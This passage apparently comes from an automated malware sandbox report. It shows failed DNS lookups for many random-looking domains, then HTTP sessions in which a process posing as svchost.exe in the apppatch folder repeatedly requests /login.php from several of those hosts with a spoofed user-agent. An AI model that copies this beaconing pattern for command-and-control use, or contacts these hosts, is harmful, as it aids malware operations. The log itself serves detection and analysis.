                                                                                                                                                                                                          Nov 11, 2024 18:25:53.979896069 CET1.1.1.1192.168.2.80x4bbeName error (3)lyvytuj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.980683088 CET1.1.1.1192.168.2.80xd7fcName error (3)volykyc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.981991053 CET1.1.1.1192.168.2.80xe75cName error (3)volyqat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.982877970 CET1.1.1.1192.168.2.80x7f6dName error (3)lykyjad.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.987936020 CET1.1.1.1192.168.2.80x20bName error (3)puzywel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.988867044 CET1.1.1.1192.168.2.80x2734Name error (3)vofygum.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.990350962 CET1.1.1.1192.168.2.80x9859Name error (3)pujyjav.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:54.173249960 CET1.1.1.1192.168.2.80x50a8Server failure (2)lysyfyj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.250608921 CET1.1.1.1192.168.2.80x10a5Name error (3)puzyjoq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.251127005 CET1.1.1.1192.168.2.80xab16Name error (3)lymytux.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.251137018 CET1.1.1.1192.168.2.80xa7ebName error (3)qexykaq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.253231049 CET1.1.1.1192.168.2.80x759dName error (3)qedyveg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.258804083 CET1.1.1.1192.168.2.80x41a5Name error (3)pufybyv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.272686005 CET1.1.1.1192.168.2.80x857eName error (3)qeqytup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.273504019 CET1.1.1.1192.168.2.80xda92Name error (3)vowypit.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.275655985 CET1.1.1.1192.168.2.80x628bName error (3)gaqypiz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.275882006 CET1.1.1.1192.168.2.80x82bdName error (3)purypol.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.275901079 CET1.1.1.1192.168.2.80x1a70Name error (3)gahynus.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.277544022 CET1.1.1.1192.168.2.80x4816Name error (3)vojymic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.278758049 CET1.1.1.1192.168.2.80xb5cfName error (3)qegynuv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.281116009 CET1.1.1.1192.168.2.80x3345Name error (3)lyvylyn.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.285027027 CET1.1.1.1192.168.2.80x6e5dName error (3)lyxyjaj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.296744108 CET1.1.1.1192.168.2.80x81d3Name error (3)vocykem.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.304819107 CET1.1.1.1192.168.2.80x8fc0Name error (3)volyjok.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.314990044 CET1.1.1.1192.168.2.80xd3ffName error (3)qegyfyp.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.328619003 CET1.1.1.1192.168.2.80x6064Name error (3)qexyqog.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.336460114 CET1.1.1.1192.168.2.80xb04dNo error (0)lysyvan.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.336460114 CET1.1.1.1192.168.2.80xb04dNo error (0)lysyvan.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.336508989 CET1.1.1.1192.168.2.80xd545Name error (3)ganyrys.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.343678951 CET1.1.1.1192.168.2.80x5a59Name error (3)pumytup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.344980001 CET1.1.1.1192.168.2.80x957bName error (3)galyhiw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.347970009 CET1.1.1.1192.168.2.80xc56No error (0)lygynud.com3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.353348017 CET1.1.1.1192.168.2.80xfcfdName error (3)gatycoh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.362140894 CET1.1.1.1192.168.2.80xa9c4Name error (3)vonyryc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.377762079 CET1.1.1.1192.168.2.80x7da4Name error (3)puryxuq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.381623983 CET1.1.1.1192.168.2.80x8b09Name error (3)pujygul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.381629944 CET1.1.1.1192.168.2.80x4caaName error (3)puvylyg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.382554054 CET1.1.1.1192.168.2.80x3e9bName error (3)puvywav.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.382719994 CET1.1.1.1192.168.2.80xaca0Name error (3)qebyrev.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.383255959 CET1.1.1.1192.168.2.80x7587Name error (3)vojygut.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.384507895 CET1.1.1.1192.168.2.80xffefName error (3)qetyxiq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.384799957 CET1.1.1.1192.168.2.80xff4bName error (3)lyryxij.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.392082930 CET1.1.1.1192.168.2.80x4421Name error (3)ganyzub.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.392090082 CET1.1.1.1192.168.2.80x2856Name error (3)vopycom.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.396426916 CET1.1.1.1192.168.2.80x22cbName error (3)lyvywed.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.403115988 CET1.1.1.1192.168.2.80x61ddName error (3)qeqylyl.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.403858900 CET1.1.1.1192.168.2.80x903cName error (3)lykygur.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.404027939 CET1.1.1.1192.168.2.80x1c7dName error (3)gacyqob.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.414680004 CET1.1.1.1192.168.2.80xe08aName error (3)puzymig.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.415659904 CET1.1.1.1192.168.2.80x58c9Name error (3)vopydek.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.416290998 CET1.1.1.1192.168.2.80x8127Name error (3)vofybyf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.416296959 CET1.1.1.1192.168.2.80x4dc7Name error (3)pufydep.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.416497946 CET1.1.1.1192.168.2.80x2a89Name error (3)vofydac.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.417188883 CET1.1.1.1192.168.2.80xa5fdName error (3)lymylyr.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.417330027 CET1.1.1.1192.168.2.80xbabeName error (3)gacykeh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.417335987 CET1.1.1.1192.168.2.80x6b84Name error (3)gatydaw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.417547941 CET1.1.1.1192.168.2.80x6121Name error (3)gadyveb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.417632103 CET1.1.1.1192.168.2.80xe735Name error (3)lykymox.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.417664051 CET1.1.1.1192.168.2.80x85c5Name error (3)gaqyzuw.comnonenoneA (IP address)IN (0x0001)false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49705 | 18.208.156.248 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:04.847726107 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: vonypom.com
Nov 11, 2024 18:24:05.285598993 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:05 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: btst=faa9bb05a3860b2faaecfff75b475d85|66.23.206.109|1731345845|1731345845|0|1|0; path=/; domain=.vonypom.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                          Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49706 | 199.191.50.83 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:04.932044029 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: galyqaz.com
Nov 11, 2024 18:24:07.324378967 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:05 GMT
                                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                                          Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                          Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                          Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                                                                          Set-Cookie: vsid=904vr478891445443024397; expires=Sat, 10-Nov-2029 17:24:05 GMT; Max-Age=157680000; path=/; domain=galyqaz.com; HttpOnly
                                                                                                                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_NHOnw0G73BscnvIcyf8HaXYxUwB52N5y4R2rV77ldfg6F/P3HTMIgnr4aIPWR/fyPGslgb3huQzNdSH/7sK+hw==
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49707 | 154.212.231.82 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:04.956163883 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gadyniw.com
Nov 11, 2024 18:24:05.876477003 CET | 696 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:05 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 548
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:24:05.890208960 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gadyniw.com
Nov 11, 2024 18:24:06.503927946 CET | 696 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:06 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 548
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:24:06.504236937 CET | 696 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:06 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 548
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:24:27.038609028 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gadyniw.com
Nov 11, 2024 18:24:27.425607920 CET | 696 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:27 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 548
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:24:27.548175097 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gadyniw.com
Nov 11, 2024 18:24:27.912127972 CET | 696 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:27 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 548
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49708 | 23.253.46.64 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:04.978677034 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gahyqah.com
Nov 11, 2024 18:24:05.431714058 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Server: Microsoft-IIS/7.5
                                                                                                                                                                                                          X-Powered-By: ASP.NET
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:00 GMT
                                                                                                                                                                                                          Content-Length: 1245
                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
Nov 11, 2024 18:24:05.432348967 CET | 169 | IN | Data Raw: 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67
                                                                                                                                                                                                          Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49709 | 188.114.96.3 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:05.045310020 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyhig.com
Nov 11, 2024 18:24:06.503948927 CET | 963 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:06 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: https://qegyhig.com/login.php
                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n1zvQOqfAVfMcm9jnSq95fMr55U5EhSwjZTZius3G1jTow57gBPFd%2BvjUy%2FH0QHR%2FiUak35l6vSxW90HMTEFbov1CiBj6MuexknAhZvAJWX0jXb5xyaANGEh6RmS7g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8e0ff94dfcd03905-YYZ
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11716&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=35&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
Nov 11, 2024 18:24:06.503962040 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
Nov 11, 2024 18:24:06.503972054 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
Nov 11, 2024 18:24:07.972210884 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyhig.com
Nov 11, 2024 18:24:08.341226101 CET | 975 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:08 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: https://qegyhig.com/login.php
                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PJq%2F%2FQO7HXKFLWjXQvM629mNBO9aywrlErL%2FsC5xitbkmSNDT0aXf92PpSeoAvsWDh2pWQUpXLsxEsIqnlvyD5xUKugXk8rhGxirlSIjsku6JluCfzPW7ntELbaMig%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8e0ff95e195c3905-YYZ
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11744&sent=4&recv=6&lost=0&retrans=0&sent_bytes=968&recv_bytes=486&delivery_rate=241958&cwnd=37&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
Nov 11, 2024 18:24:27.016472101 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyhig.com
Nov 11, 2024 18:24:27.403179884 CET | 981 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:27 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: https://qegyhig.com/login.php
                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=44YvV0J%2BY5Cfs%2BuPg0E4zgulj0q8sfin%2FFgH1NeRFsgzoMTz23%2BWbQB7v%2BhJx8LuTHNWJHMgmGIO4AaXIo3Lz2Wi3P95HPUZtPs44seGoJmTBrH6kDEfG2iTzIeE8Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8e0ff9d52f523905-YYZ
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11719&sent=8&recv=10&lost=0&retrans=0&sent_bytes=1943&recv_bytes=729&delivery_rate=367668&cwnd=40&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
Nov 11, 2024 18:24:29.473287106 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyhig.com
Nov 11, 2024 18:24:29.830542088 CET | 979 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:29 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: https://qegyhig.com/login.php
                                                                                                                                                                                                          cf-cache-status: DYNAMIC
